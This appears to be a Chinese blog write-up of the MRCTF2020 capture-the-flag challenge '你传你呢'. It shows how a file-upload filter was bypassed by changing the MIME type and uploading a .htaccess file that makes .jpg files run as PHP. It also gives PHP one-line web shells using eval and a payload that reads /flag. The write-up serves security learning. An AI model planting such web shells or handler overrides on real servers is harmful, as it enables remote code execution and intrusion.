[MRCTF2020]你传你呢

发布时间 2023-10-09 14:48:34作者: 圆弧状态

原理

  1. .htaccess文件解析漏洞
  2. 以及MIME的修改,注意注意,三种MIME值png,jpg,gif不行的话都要试一遍,不要错过啦- -
  3. 手搓连接木马的系统命令多种使用方式
  4. payload:var_dump(scandir('/')); echo file_get_contents('/flag');

解题过程

进入靶场,让上传文件

上传文件抓包,发现包被过滤了,先试试改MIME值

发现MIME值改成png就能上传了

但是上传的只是gif文件,把文件后缀换成php,phtml等等都不行被过滤了。再试试上传.htaccess
同理修改MIME值才能过

.htaccess写法
方法一
<FilesMatch "1.jpg">
  SetHandler application/x-httpd-php
</FilesMatch>
// 1.jpg
<?php eval($_GET['a']);?>

方法二:
AddType application/x-httpd-php .jpg
// 1.jpg
<?php eval($_GET['a']);?>
php木马写法
<script language='php'>@eval($_POST['aaa']);</script>
<?php @eval($_POST['aaa']);?>

那就用工具连接或者手动连接了

手动连接的时候参数echo system('ls /')或者var_dump(system('ls /'))都不行
只有var_dump(scandir('/'))才可以读出目录
最后读取文件内容
var_dump(file_get_contents('/flag'));

参考文章:https://blog.csdn.net/weixin_44632787/article/details/118049911